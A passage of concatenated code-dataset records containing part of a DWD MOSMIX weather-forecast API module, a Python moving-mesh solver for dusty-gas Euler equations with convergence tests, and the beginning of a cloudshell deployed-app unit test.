Columns.STATION_ID.value,\n Columns.DATE.value,\n ],\n var_name=DwdColumns.PARAMETER.value,\n value_name=DwdColumns.VALUE.value,\n )\n\n df[Columns.QUALITY.value] = np.nan\n\n df[Columns.QUALITY.value] = df[Columns.QUALITY.value].astype(float)\n\n return df_tidy\n\n def read_mosmix(\n self, date: Union[datetime, DwdForecastDate]\n ) -> Generator[pd.DataFrame, None, None]:\n \"\"\"\n Manage data acquisition for a given date that is used to filter the found files\n on the MOSMIX path of the DWD server.\n\n :param date: datetime or enumeration for latest MOSMIX forecast\n :return: DWDMosmixResult with gathered information\n \"\"\"\n for df_forecast in self._read_mosmix(date):\n df_forecast = df_forecast.rename(\n columns={\n \"station_id\": DwdColumns.STATION_ID.value,\n \"datetime\": DwdColumns.DATE.value,\n }\n )\n\n yield df_forecast\n\n def _read_mosmix(\n self, date: Union[DwdForecastDate, datetime]\n ) -> Generator[pd.DataFrame, None, None]:\n \"\"\"\n Wrapper that either calls read_mosmix_s or read_mosmix_l depending on\n defined period type\n\n :param date:\n :return:\n \"\"\"\n if self.stations.stations.mosmix_type == DwdMosmixType.SMALL:\n yield from self.read_mosmix_small(date)\n else:\n yield from self.read_mosmix_large(date)\n\n def read_mosmix_small(\n self, date: Union[DwdForecastDate, datetime]\n ) -> Generator[Tuple[pd.DataFrame, pd.DataFrame], None, None]:\n \"\"\"\n Reads single MOSMIX-S file with all stations and returns every forecast that\n matches with one of the defined station ids.\n\n :param date:\n :return:\n \"\"\"\n url = urljoin(DWD_SERVER, DWD_MOSMIX_S_PATH)\n\n file_url = self.get_url_for_date(url, date)\n\n self.kml.read(file_url)\n\n for forecast in self.kml.get_forecasts():\n yield forecast\n\n def read_mosmix_large(\n self, date: Union[DwdForecastDate, datetime]\n ) -> Generator[Tuple[pd.DataFrame, pd.DataFrame], None, None]:\n \"\"\"\n Reads multiple MOSMIX-L files with one per each station and returns a\n forecast per file.\n\n :param date:\n :return:\n \"\"\"\n url = urljoin(DWD_SERVER, DWD_MOSMIX_L_SINGLE_PATH)\n\n for station_id in self.stations.station_id:\n station_url = f\"{url}{station_id}/kml\"\n\n try:\n file_url = self.get_url_for_date(station_url, date)\n except HTTPError:\n log.warning(f\"Files for {station_id} do not exist on the server\")\n continue\n\n self.kml.read(file_url)\n\n yield next(self.kml.get_forecasts())\n\n @staticmethod\n def get_url_for_date(url: str, date: Union[datetime, DwdForecastDate]) -> str:\n \"\"\"\n Method to get a file url based on the MOSMIX-S/MOSMIX-L url and the date that is\n used for filtering.\n\n :param url: MOSMIX-S/MOSMIX-L path on the dwd server\n :param date: date used for filtering of the available files\n :return: file url based on the filtering\n \"\"\"\n urls = list_remote_files_fsspec(url, recursive=False)\n\n if date == DwdForecastDate.LATEST:\n try:\n url = list(filter(lambda url_: \"LATEST\" in url_.upper(), urls))[0]\n return url\n except IndexError as e:\n raise IndexError(f\"Unable to find LATEST file within {url}\") from e\n\n df_urls = pd.DataFrame({\"URL\": urls})\n\n df_urls[DwdColumns.DATE.value] = df_urls[\"URL\"].apply(\n lambda url_: url_.split(\"/\")[-1].split(\"_\")[2].replace(\".kmz\", \"\")\n )\n\n df_urls = df_urls[df_urls[DwdColumns.DATE.value] != \"LATEST\"]\n\n df_urls[DwdColumns.DATE.value] = pd.to_datetime(\n df_urls[DwdColumns.DATE.value], format=DatetimeFormat.YMDH.value\n )\n\n df_urls = df_urls.loc[df_urls[DwdColumns.DATE.value] == date]\n\n if df_urls.empty:\n raise IndexError(f\"Unable to find {date} file within {url}\")\n\n return df_urls[\"URL\"].item()\n\n\nclass DwdMosmixRequest(ScalarRequestCore):\n \"\"\" Implementation of sites for MOSMIX forecast sites \"\"\"\n\n provider = Provider.DWD\n kind = Kind.FORECAST\n\n _url = (\n \"https://www.dwd.de/DE/leistungen/met_verfahren_mosmix/\"\n \"mosmix_stationskatalog.cfg?view=nasPublication\"\n )\n\n _colspecs = [\n (0, 5),\n (6, 11),\n (12, 17),\n (18, 22),\n (23, 44),\n (45, 51),\n (52, 58),\n (59, 64),\n (65, 71),\n (72, 76),\n ]\n\n _columns = [\n Columns.STATION_ID.value,\n Columns.ICAO_ID.value,\n Columns.FROM_DATE.value,\n Columns.TO_DATE.value,\n Columns.HEIGHT.value,\n Columns.LATITUDE.value,\n Columns.LONGITUDE.value,\n Columns.NAME.value,\n Columns.STATE.value,\n ]\n\n _tz = Timezone.GERMANY\n _parameter_base = DwdMosmixParameter\n _values = DwdMosmixValues\n\n _resolution_type = ResolutionType.FIXED\n _resolution_base = Resolution # use general Resolution for fixed Resolution\n _period_type = PeriodType.FIXED\n _period_base = None\n _data_range = DataRange.FIXED\n _has_datasets = True\n _dataset_tree = DwdMosmixParameter\n _unique_dataset = True\n _dataset_base = DwdMosmixDataset\n\n _unit_tree = DwdMosmixUnit\n\n @property\n def _dataset_accessor(self) -> str:\n \"\"\"\n\n :return:\n \"\"\"\n return self.mosmix_type.name\n\n @classmethod\n def _setup_discover_filter(cls, filter_):\n \"\"\"\n Use SMALL and LARGE instead of resolution, which is fixed for Mosmix\n\n :param filter_:\n :return:\n \"\"\"\n filter_ = pd.Series(filter_).apply(\n parse_enumeration_from_template, args=(cls._dataset_base,)\n ).tolist() or [*cls._dataset_base]\n\n return filter_\n\n _base_columns = [\n Columns.STATION_ID.value,\n Columns.ICAO_ID.value,\n Columns.FROM_DATE.value,\n Columns.TO_DATE.value,\n Columns.HEIGHT.value,\n Columns.LATITUDE.value,\n Columns.LONGITUDE.value,\n Columns.NAME.value,\n Columns.STATE.value,\n ]\n\n @staticmethod\n def adjust_datetime(datetime_: datetime) -> datetime:\n \"\"\"\n Adjust datetime to MOSMIX release frequency, which is required for MOSMIX-L\n that is only released very 6 hours (3, 9, 15, 21). Datetime is floored\n to closest release time e.g. if hour is 14, it will be rounded to 9\n\n :param datetime_: datetime that is adjusted\n :return: adjusted datetime with floored hour\n \"\"\"\n regular_date = datetime_ + pd.offsets.DateOffset(hour=3)\n\n if regular_date > datetime_:\n regular_date -= pd.Timedelta(hours=6)\n\n delta_hours = (datetime_.hour - regular_date.hour) % 6\n\n datetime_adjusted = datetime_ - pd.Timedelta(hours=delta_hours)\n\n return datetime_adjusted\n\n def __init__(\n self,\n parameter: Optional[Tuple[Union[str, DwdMosmixParameter], ...]],\n mosmix_type: Union[str, DwdMosmixType],\n start_issue: Optional[\n Union[str, datetime, DwdForecastDate]\n ] = DwdForecastDate.LATEST,\n end_issue: Optional[Union[str, datetime]] = None,\n start_date: Optional[Union[str, datetime]] = None,\n end_date: Optional[Union[str, datetime]] = None,\n humanize: bool = True,\n tidy: bool = True,\n si_units: bool = True,\n ) -> None:\n \"\"\"\n\n :param parameter: parameter(s) to be collected\n :param mosmix_type: mosmix type, either small or large\n :param start_issue: start of issue of mosmix which should be caught\n (Mosmix run at time XX:YY)\n :param end_issue: end of issue\n :param start_date: start date for filtering returned dataframe\n :param end_date: end date\n :param humanize: humanize parameter names\n :param tidy: tidy data to be row-wise\n :param si_units: convert to si units\n \"\"\"\n self.mosmix_type = parse_enumeration_from_template(mosmix_type, DwdMosmixType)\n\n super().__init__(\n parameter=parameter,\n start_date=start_date,\n end_date=end_date,\n resolution=Resolution.HOURLY,\n period=Period.FUTURE,\n si_units=si_units,\n )\n\n if not start_issue:\n start_issue = DwdForecastDate.LATEST\n\n try:\n start_issue = parse_enumeration_from_template(start_issue, DwdForecastDate)\n except InvalidParameter:\n pass\n\n # Parse issue date if not set to fixed \"latest\" string\n if start_issue is DwdForecastDate.LATEST and end_issue:\n log.info(\n \"end_issue will be ignored as 'latest' was selected for issue date\"\n )\n\n if start_issue is not DwdForecastDate.LATEST:\n if not start_issue and not end_issue:\n start_issue = DwdForecastDate.LATEST\n elif not end_issue:\n end_issue = start_issue\n elif not start_issue:\n start_issue = end_issue\n\n start_issue = pd.to_datetime(start_issue, infer_datetime_format=True).floor(\n \"1H\"\n )\n end_issue = pd.to_datetime(end_issue, infer_datetime_format=True).floor(\n \"1H\"\n )\n\n # Shift start date and end date to 3, 9, 15, 21 hour format\n if mosmix_type == DwdMosmixType.LARGE:\n start_issue = self.adjust_datetime(start_issue)\n end_issue = self.adjust_datetime(end_issue)\n\n # TODO: this should be replaced by the freq property in the main class\n if self.mosmix_type == DwdMosmixType.SMALL:\n self.resolution = Resolution.HOURLY\n else:\n self.resolution = Resolution.HOUR_6\n\n self.start_issue = start_issue\n self.end_issue = end_issue\n self.humanize = humanize\n self.tidy = tidy\n\n @property\n def issue_start(self):\n \"\"\" Required for typing \"\"\"\n return self.issue_start\n\n @property\n def issue_end(self):\n \"\"\" Required for typing \"\"\"\n return self.issue_end\n\n @metaindex_cache.cache_on_arguments()\n def _all(self) -> pd.DataFrame:\n \"\"\"\n Create meta data DataFrame from available station list\n\n :return:\n \"\"\"\n # TODO: Cache payload with FSSPEC\n payload = requests.get(self._url, headers={\"User-Agent\": \"\"})\n\n df = pd.read_fwf(\n StringIO(payload.text),\n skiprows=4,\n skip_blank_lines=True,\n colspecs=self._colspecs,\n na_values=[\"----\"],\n header=None,\n dtype=\"str\",\n )\n\n df = df[\n (df.iloc[:, 0] != \"=====\")\n & (df.iloc[:, 0] != \"TABLE\")\n & (df.iloc[:, 0] != \"clu\")\n ]\n\n df = df.iloc[:, [2, 3, 4, 5, 6, 7]]\n\n df.columns = [\n Columns.STATION_ID.value,\n Columns.ICAO_ID.value,\n Columns.NAME.value,\n Columns.LATITUDE.value,\n Columns.LONGITUDE.value,\n Columns.HEIGHT.value,\n ]\n\n # Convert coordinates from degree minutes to decimal degrees\n df[Columns.LATITUDE.value] = (\n df[Columns.LATITUDE.value].astype(float).apply(convert_dm_to_dd)\n )\n\n df[Columns.LONGITUDE.value] = (\n df[Columns.LONGITUDE.value].astype(float).apply(convert_dm_to_dd)\n )\n\n df = df.reindex(columns=self._columns)\n\n return df\n","sub_path":"wetterdienst/provider/dwd/forecast/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":18033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"297667675","text":"from __future__ import print_function\nimport numpy as np\n\nfrom HLLC import HLLC\nfrom dustywave_sol import DustyWaveSolver\n\nGAMMA = 5/3.\nNHYDRO = 5\n\ni_rho_g = 0\ni_vel_g = 1\ni_pre_g = 2\n\ni_rho_d = 3\ni_vel_d = 4\n\nK = 10000.0\n\n\nFB = 1.0\n\ndef prim2cons(W):\n U = np.full((len(W), NHYDRO), np.nan) #conserved state vector\n # Gas\n U[:,0] = W[:,0] # density\n U[:,1] = W[:,0]*W[:,1] # momentum\n U[:,2] = W[:,2]/(GAMMA-1) + (W[:,0]*W[:,1]**2)/2 # energy\n # Dust\n U[:,3] = W[:,3] # density\n U[:,4] = W[:,3]*W[:,4] # momentum\n return(U)\n\t\ndef cons2prim(U):\n W = np.full((len(U), NHYDRO), np.nan) #primitive state vector\n # Gas\n W[:,0] = U[:,0] # density\n W[:,1] = U[:,1]/U[:,0] # velocity\n W[:,2] = (GAMMA-1)*(U[:,2] - (U[:,1]**2/U[:,0])/2)\t# pressure\n # Dust\n W[:,3] = U[:,3] # density\n W[:,4] = U[:,4]/U[:,3] # velocity\n return(W)\n\t\ndef prim2flux(W):\n F = np.full((len(W), NHYDRO), np.nan)\n # Gas\n F[:,0] = W[:,0]*W[:,1] # mass \n F[:,1] = W[:,0]*W[:,1]**2 + W[:,2] # momentum \n F[:,2] = W[:,1]*(W[:,2]/(GAMMA-1) + (W[:,0]*W[:,1]**2)/2 + W[:,2]) # energy\n # Dust\n F[:,3] = W[:,3]*W[:,4] # mass \n F[:,4] = W[:,3]*W[:,4]**2 # momentum \n return(F)\n\n\ndef compute_gradients(xc, xe, Q):\n Qm = Q[:-2]\n Q0 = Q[1:-1]\n Qp = Q[2:]\n\n dx = xc[2:] - xc[:-2]\n\n Qmax = np.maximum(np.maximum(Qp, Qm), Q0)\n Qmin = np.minimum(np.minimum(Qp, Qm), Q0)\n\n grad = (Qp - Qm) / dx.reshape(-1,1)\n\n dQ = grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Qp = Q0 + dQ\n\n pos = Qp > Qmax ; neg = Qp < Qmin\n with np.errstate(all='ignore'):\n phir = np.where(pos, (Qmax - Q0)/dQ, np.where(neg, (Qmin - Q0)/dQ, 1))\n \n dQ = grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n Qm = Q0 + dQ\n \n pos = Qm > Qmax ; neg = Qm < Qmin\n with np.errstate(all='ignore'):\n phil = np.where(pos, (Qmax - Q0)/dQ, np.where(neg, (Qmin - Q0)/dQ, 1))\n\n alpha = np.maximum(0, np.minimum(1, np.minimum(phir, phil)))\n grad *= alpha\n\n return grad\n\n\ndef compute_time_diff_W(W, gradW, vframe):\n \n dWdt = np.zeros_like(W)\n\n rho_g = W[:, i_rho_g]\n grad_rho_g = gradW[:, i_rho_g]\n \n v_g = W[:, i_vel_g] - vframe\n grad_v_g = gradW[:, i_vel_g]\n\n P = W[:, i_pre_g]\n grad_P = gradW[:, i_pre_g]\n\n dWdt[:,i_rho_g] = - v_g*grad_rho_g - rho_g *grad_v_g\n dWdt[:,i_vel_g] = - v_g *grad_v_g - (1/rho_g)*grad_P\n dWdt[:,i_pre_g] = - GAMMA*P*grad_v_g - v_g *grad_P\n\n rho_d = W[:, i_rho_d]\n grad_rho_d = gradW[:, i_rho_d]\n\n v_d = W[:, i_vel_d] - vframe\n grad_v_d = gradW[:, i_vel_d]\n\n dWdt[:,i_rho_d] = - v_d*grad_rho_d - rho_d *grad_v_d\n dWdt[:,i_vel_d] = - v_d *grad_v_d \n\n return dWdt\n\ndef wrapflux_moving_mesh(riemann):\n \n def compute_flux(WL, WR, vf):\n WL, WR = WL.copy(), WR.copy()\n\n WL[:,1] -= vf ; WR[:,1] -= vf\n WL[:,4] -= vf ; WR[:,4] -= vf\n\n flux = riemann(WL, WR)\n \n flux[:,2] += 0.5*flux[:,0]*vf**2 + flux[:,1]*vf\n flux[:,1] += flux[:,0]*vf\n\n flux[:,4] += flux[:,3]*vf\n\n return flux\n\n return compute_flux\n\ndef dust_solver(WL, WR):\n \"\"\"Solve the Riemann Problem for dust\"\"\"\n\n # Compute the conserved quantities\n UL = np.full([len(WL), 2], np.nan)\n UL[:,0] = WL[:,i_rho_d]\n UL[:,1] = WL[:,i_rho_d]*WL[:,i_vel_d]\n\n UR = np.full([len(WR), 2], np.nan)\n UR[:,0] = WR[:,i_rho_d]\n UR[:,1] = WR[:,i_rho_d]*WR[:,i_vel_d]\n\n fL = UL*WL[:,4].reshape(-1,1)\n fR = UR*WR[:,4].reshape(-1,1)\n\n # Upwind the advection\n f_dust = np.zeros_like(UL)\n f_dust[(WL[:,4] > 0)] += fL[(WL[:,4] > 0)]\n f_dust[(WR[:,4] < 0)] += fR[(WR[:,4] < 0)]\n\n # Dust signal speed: Roe-average\n #R = np.sqrt(WL[:,3]/WR[:,3])\n #f = R /(1 + R)\n\n #Sd = (f*WL[:,4] + (1-f)*WR[:,4]).reshape(-1,1)\n #f_dust = Sd*np.where(Sd > 0, UL, UR)\n\n return f_dust\n\n@wrapflux_moving_mesh\ndef HLL_solver(WL, WR):\n UL = prim2cons(WL)\n UR = prim2cons(WR)\n \n fL = prim2flux(WL)\n fR = prim2flux(WR)\n \n csl = np.sqrt(GAMMA*WL[:,2]/WL[:,0])\n csr = np.sqrt(GAMMA*WR[:,2]/WR[:,0])\n \n Sm = (WL[:,1] - csl).reshape(-1,1)\n Sp = (WR[:,1] + csr).reshape(-1,1)\n\n \n # HLL central state\n fHLL = (Sp*fL - Sm*fR + Sp*Sm*(UR - UL)) / (Sp - Sm)\n\n # Left / Right states\n indexL = Sm.reshape(-1) >= 0\n indexR = Sp.reshape(-1) <= 0\n fHLL[indexL] = fL[indexL]\n fHLL[indexR] = fR[indexR]\n\n # Overwrite the dust flux\n fHLL[:,3:] = dust_solver(WL, WR)\n\t \n return fHLL\n\n_HLLC = HLLC(gamma=GAMMA)\n@wrapflux_moving_mesh\ndef HLLC_solver(WL, WR):\n UL, UR = prim2cons(WL), prim2cons(WR)\n flux_HLLC = _HLLC(UL[:,:3].T, UR[:,:3].T)\n\n flux = np.zeros_like(WL)\n flux[:,:3] = flux_HLLC.T\n flux[:,3:] = dust_solver(WL, WR)\n\n return flux\n\n\ndef max_wave_speed(U, vf):\n W = cons2prim(U)\n return np.maximum(np.abs(W[:,1]-vf) + np.sqrt(GAMMA*W[:,2]/W[:,0]), \n np.abs(W[:,4]-vf))\n\n \ndef solve_euler(Npts, IC, tout, Ca = 0.7, lagrangian=False, HLLC=True):\n \"\"\"Test schemes using an Explicit TVD RK integration\"\"\"\n # Setup up the grid\n stencil = 2\n \n xe = np.linspace(0.0, 1.0, Npts+1)\n xc = 0.5*(xe[1:] + xe[:-1])\n\n def boundary(xc, Q):\n # Add periodic boundaries to Q\n Qb = np.empty([Npts+2*stencil, NHYDRO])\n Qb[stencil:-stencil] = Q\n Qb[ :stencil] = Qb[Npts:Npts+stencil]\n Qb[-stencil:] = Qb[stencil:2*stencil]\n\n # Add periodic boundaries for cell centres and compute interfaces\n xc_b = np.empty(Npts+2*(stencil+1))\n xc_b[(stencil+1):-(stencil+1)] = xc\n xc_b[ :(stencil+1)] = xc[-(stencil+1):] - 1\n xc_b[-(stencil+1):] = xc[ :(stencil+1)] + 1\n\n xe = 0.5*(xc_b[1:] + xc_b[:-1])\n xc_b = xc_b[1:-1]\n\n return xc_b, xe, Qb\n\n def RK2_prim(xc_in, Q, dt):\n #1. Apply Boundaries\n xc, xe, Qb = boundary(xc_in, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #2. Compute Primitive variables\n Ub = Qb / dx\n Wb = cons2prim(Ub)\n\n #3. Compute gradients\n grad = compute_gradients(xc, xe, Wb)\n\n #4. Set interface velocities:\n if lagrangian:\n vc = Wb[:,1].copy()\n else:\n vc = np.zeros_like(Wb[:,1])\n f = (xe[1:-1] - xc[:-1]) / (xc[1:]-xc[:-1])\n vf = f*vc[1:] + (1-f)*vc[:-1]\n\n #5. Compute edge states:\n Wp = Wb[1:-1] + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Wb[1:-1] + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #6. Compute first fluxes:\n if HLLC:\n flux_0 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_0 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #7. Move the mesh and compute new face locations:\n xc = xc_in + vc[stencil:-stencil]*dt\n xc, xe, _ = boundary(xc, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #8. Predict edge states at t+dt\n # 8a. First predict the mid-points at t+dt\n dWdt = compute_time_diff_W(Wb[1:-1], grad, vc[1:-1]) \n Ws0 = Wb[1:-1] + dt*dWdt\n Ws = Wb[1:-1] + dt*dWdt\n\n # 8b. Apply the drag forces using Exponential Euler method\n rho = Ws[:,0] + FB*Ws[:,3]\n \n v_com = (Ws[:,0]*Ws[:,1] + FB*Ws[:,3]*Ws[:,4])/rho\n dV = (Wb[1:-1,4] - Wb[1:-1,1]) * np.exp(-K*rho*dt) \n da = (dWdt[:,4] - dWdt[:,1]) *-np.expm1(-dt*K*rho)/(K*rho)\n\n Ws[:,1] = v_com - FB*Ws[:,3]*(dV + da)/rho\n Ws[:,4] = v_com + Ws[:,0]*(dV + da)/rho\n \n # Heating due to drag\n dEk = 0.5*(Ws[:,0]*Ws[:,1]**2 - Ws0[:,0]*Ws0[:,1]**2 +\n Ws[:,3]*Ws[:,4]**2 - Ws0[:,3]*Ws0[:,4]**2)\n Ws[:,2] -= dEk * (GAMMA-1)\n \n # 8c. Reconstruct the edge states\n Wp = Ws + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Ws + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #9. Compute second fluxes\n if HLLC:\n flux_1 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_1 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #10. Compute the drag terms using 2nd order exponential Runge-Kutta method.\n f_g0 = -np.diff(flux_0[:,1]) ; f_g1 = -np.diff(flux_1[:,1])\n f_d0 = -np.diff(flux_0[:,4]) ; f_d1 = -np.diff(flux_1[:,4])\n\n Qn = Q - 0.5*dt*np.diff(flux_0 + flux_1, axis=0) \n\n m_com = Qn[:,1] + FB*Qn[:,4]\n \n rho = Qn[:,0] + FB*Qn[:,3]\n eps_g = Qn[:,0] / rho ; eps_d = Qn[:,3] / rho\n rho /= np.diff(xe[stencil:-stencil])\n\n df = (eps_g*(f_d0+f_d1) - eps_d*(f_g0+f_g1)) / 2\n\n dm = (eps_g*Q[:,4] - eps_d*Q[:,1]) * np.exp(-K*rho*dt) \n dm += df *-np.expm1(-dt*K*rho)/(K*rho)\n \n m_d = eps_d * m_com + dm\n m_g = eps_g * m_com - dm*FB\n\n #11. Update Conserved quantities\n Q[:] = Qn\n\n Q[:,1] = m_g\n Q[:,4] = m_d\n\n # Heating due to drag to conserve energy\n if FB:\n Q[:,2] -= 0.5*(Q[:,4]**2 - Qn[:,4]**2) / Q[:,3]\n \n\n # Return\n xc = xc[stencil:-stencil]\n xe = xe[stencil:-stencil]\n\n return xc, xe, Q\n\n # Set the initial conditions\n dx = np.diff(xe).reshape(-1,1)\n W = IC(xe)\n U = prim2cons(W)\n Q = U * dx\n\n t = 0\n while t < tout:\n\n U = Q/dx\n\n vf = 0\n if lagrangian:\n vf = U[:,1] / U[:,0]\n dtmax = Ca * np.min(dx / max_wave_speed(U, vf))\n dt = min(dtmax, tout-t)\n\n xc, xe, Q = RK2_prim(xc, Q, dt)\n dx = np.diff(xe).reshape(-1,1)\n \n t = min(tout, t+dt)\n \n\n return xc, xe, cons2prim(Q/dx)\n \ndef _test_convergence(IC, pmin=3, pmax=9, t_final=3.0,\n figs_evol=None, fig_err=None):\n\n N = 2**np.arange(pmin, pmax+1)\n for lagrangian in [True, False]:\n err_gas = []\n err_dust = []\n c=None\n if lagrangian:\n scheme = label='Moving'\n ls = '-'\n else:\n scheme = label='Fixed'\n ls = '--'\n print (label)\n for Ni in N:\n print ('\\t', Ni)\n x, xe, W = solve_euler(Ni, IC, t_final, Ca = 0.4, \n lagrangian=lagrangian)\n\n if figs_evol is not None:\n figs_evol[0].plot(x, W[:,0], ls=ls, label=str(Ni))\n figs_evol[1].plot(x, W[:,1], ls=ls)\n figs_evol[2].plot(x, W[:,2], ls=ls)\n figs_evol[3].plot(x, W[:,3], ls=ls)\n figs_evol[4].plot(x, W[:,4], ls=ls)\n \n figs_evol[0].set_ylabel('Density')\n figs_evol[1].set_ylabel('Velocity')\n figs_evol[2].set_ylabel('Pressure')\n figs_evol[3].set_ylabel('Dust Density')\n figs_evol[4].set_ylabel('Dust Velocity')\n\n figs_evol[2].set_xlabel('x')\n\n label=None\n \n err = W - IC(x, t=t_final)\n err_gas.append(np.sqrt(np.mean(err[:,1]**2)))\n err_dust.append(np.sqrt(np.mean(err[:,4]**2)))\n if fig_err is not None:\n c = fig_err.loglog(N, err_gas, c=c, ls='-', \n label=scheme)[0].get_color()\n fig_err.loglog(N, err_dust, c=c, ls='--')\n\n if fig_err is not None:\n fig_err.set_xlabel('N')\n fig_err.set_ylabel('L2 velocity error')\n fig_err.plot(N, 1e-4/N**2, label='1/N^2', c='k')\n fig_err.legend()\n if figs_evol is not None:\n W = IC(x, t=t_final)\n figs_evol[0].plot(x, W[:,0], ls=':', c='k', label='Exact')\n figs_evol[1].plot(x, W[:,1], ls=':', c='k')\n figs_evol[2].plot(x, W[:,2], ls=':', c='k')\n figs_evol[3].plot(x, W[:,3], ls=':', c='k')\n figs_evol[4].plot(x, W[:,4], ls=':', c='k')\n figs_evol[0].legend(loc='best',frameon=False, ncol=2)\n\n\ndef init_wave(xe, cs0=1.0, rho0=1.0, v0=1.0, drho=1e-6, t=0):\n\n if t == 0:\n kx = 2*np.pi*(xe + (v0-cs0)*t) \n\n W = np.full([len(xe)-1, NHYDRO], np.nan)\n W[:,0] = rho0 - drho*np.diff(np.cos(kx)) / np.diff(kx)\n W[:,1] = v0 - drho*cs0*np.diff(np.cos(kx)) / np.diff(kx)\n W[:,2] = (rho0*cs0**2/GAMMA) * (W[:,0]/rho0)**GAMMA\n\n W[:,3] = W[:,0]\n W[:,4] = W[:,1]\n\n else:\n sol = DustyWaveSolver(K=K,delta=drho,vf=v0,GAMMA=GAMMA,feedback=FB)(t)\n\n x = xe\n W = np.full([len(x), NHYDRO], np.nan)\n\n W[:,0] = sol.rho_gas(x)\n W[:,1] = sol.v_gas(x)\n W[:,2] = sol.P(x)\n W[:,3] = sol.rho_dust(x)\n W[:,4] = sol.v_dust(x)\n\n return W\n\n\ndef _run_and_plot_sod(Nx=256, t_final=0.1):\n f, subs = plt.subplots(5, 1)\n \n IC = init_sod\n\n # Lagrangian\n for HLLC in [True, False]:\n if HLLC:\n c = 'b'\n C = 'C'\n else:\n c = 'g'\n C = ''\n x, xe, W = solve_euler(Nx, IC, t_final, Ca = 0.4, \n lagrangian=True, HLLC=HLLC)\n x -= 0.5\n \n\n subs[0].plot(x, W[:,0], c=c, label='Moving, HLL'+C)\n subs[1].plot(x, W[:,1], c=c, )\n subs[2].plot(x, W[:,2], c=c, )\n subs[3].plot(x, W[:,3], c=c, )\n subs[4].plot(x, W[:,4], c=c, )\n\n # Fixed\n x, xe, W = solve_euler(Nx, IC, t_final, Ca = 0.4, \n lagrangian=False, HLLC=HLLC)\n x -= 0.5\n\n subs[0].plot(x, W[:,0], c=c, ls='--', label='Fixed, HLL'+C)\n subs[1].plot(x, W[:,1], c=c, ls='--')\n subs[2].plot(x, W[:,2], c=c, ls='--')\n subs[3].plot(x, W[:,3], c=c, ls='--')\n subs[4].plot(x, W[:,4], c=c, ls='--')\n \n # Add IC:\n W = IC(xe)\n subs[0].plot(x, W[:,0], c='k', label='IC')\n subs[1].plot(x, W[:,1], c='k')\n subs[2].plot(x, W[:,2], c='k')\n subs[3].plot(x, W[:,3], c='k')\n subs[4].plot(x, W[:,4], c='k')\n \n\n subs[0].set_ylabel('Density')\n subs[1].set_ylabel('Velocity')\n subs[2].set_ylabel('Pressure')\n subs[3].set_ylabel('Dust Density')\n subs[4].set_ylabel('Dust Velocity')\n\n subs[4].set_xlabel('x')\n\n subs[0].legend(loc='best')\n\n subs[0].set_xlim(0, 0.5)\n subs[1].set_xlim(0, 0.5)\n subs[2].set_xlim(0, 0.5)\n subs[3].set_xlim(0, 0.5)\n subs[4].set_xlim(0, 0.5)\n\n subs[1].set_ylim(-0.1, 0.7)\n\ndef init_sod(xe):\n Pl = 1.0\n rhol = 1.0\n vl = 0.0\n\n Pr = 0.1975\n rhor = 0.25\n vr = 0\n\n xc = 0.5*(xe[1:] + xe[:-1])\n idx = (0.25 < xc) & (xc <= 0.75)\n \n W = np.full([len(xc), NHYDRO], np.nan)\n\n W[idx, 0] = rhol\n W[idx, 1] = vl\n W[idx, 2] = Pl\n\n W[~idx, 0] = rhor\n W[~idx, 1] = vr\n W[~idx, 2] = Pr\n\n W[:,3] = W[:,0]\n W[:,4] = W[:,1]\n\n return W\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n np.seterr(invalid='raise')\n _test_convergence(init_wave, \n figs_evol=plt.subplots(5, 1)[1],\n fig_err=plt.subplots(1)[1])\n\n #_run_and_plot_sod()\n\n plt.show()\n \n","sub_path":"working_backwards/solve_dusty_euler_mm_mid.py","file_name":"solve_dusty_euler_mm_mid.py","file_ext":"py","file_size_in_byte":14999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"260630567","text":"import json\nfrom unittest.mock import Mock\n\nfrom cloudshell.shell.core.driver_context import AppContext, ResourceContextDetails\n\nfrom cloudshell.cp.core.request_actions import DeployedVMActions\nfrom cloudshell.cp.core.request_actions.models import DeployedApp\n\n\nclass StaticApp(DeployedApp):\n DEPLOYMENT_PATH = \"Generic Static vCenter VM 2G\"\n\n\nclass MyDeployedApp(DeployedApp):\n DEPLOYMENT_PATH = \"MicrosoftAzure2G.AzureVMFromMarketplace2G\"\n\n\ndef test_static_deployed_app():\n app_name = \"win-test\"\n address = \"192.168.26.43\"\n uuid = \"42282856-0637-216a-511d-ccd88aa07e8f\"\n vm_name = \"static-vms/win-test\"\n app_context = AppContext(\n app_request_json=\"\",\n deployed_app_json=json.dumps(\n {\n \"name\": app_name,\n \"family\": \"CS_GenericAppFamily\",\n \"model\": StaticApp.DEPLOYMENT_PATH,\n \"address\": address,\n \"attributes\": [\n {\n \"name\": f\"{StaticApp.DEPLOYMENT_PATH}.VM Name\",\n \"value\": \"static-vms/win-test\",\n },\n {\n \"name\": f\"{StaticApp.DEPLOYMENT_PATH}.vCenter Resource Name\",\n \"value\": \"vcenter\",\n },\n {\"name\": f\"{StaticApp.DEPLOYMENT_PATH}.User\", \"value\": \"\"},\n {\"name\": f\"{StaticApp.DEPLOYMENT_PATH}.Password\", \"value\": \"\"},\n {\"name\": f\"{StaticApp.DEPLOYMENT_PATH}.Public IP\", \"value\": \"\"},\n {\"name\": \"Execution Server Selector\", \"value\": \"\"},\n ],\n \"vmdetails\": {\n \"id\": \"8b6c4c4d-e2c9-47c9-b260-9a33688bf78a\",\n \"cloudProviderId\": \"d4d679c6-3049-4e55-9e64-8692a3400b6a\",\n \"uid\": uuid,\n \"vmCustomParams\": [],\n },\n }\n ),\n )\n resource = ResourceContextDetails(\n id=\"0917eb75-92ad-4291-9623-4235c81be76b\",\n name=app_name,\n 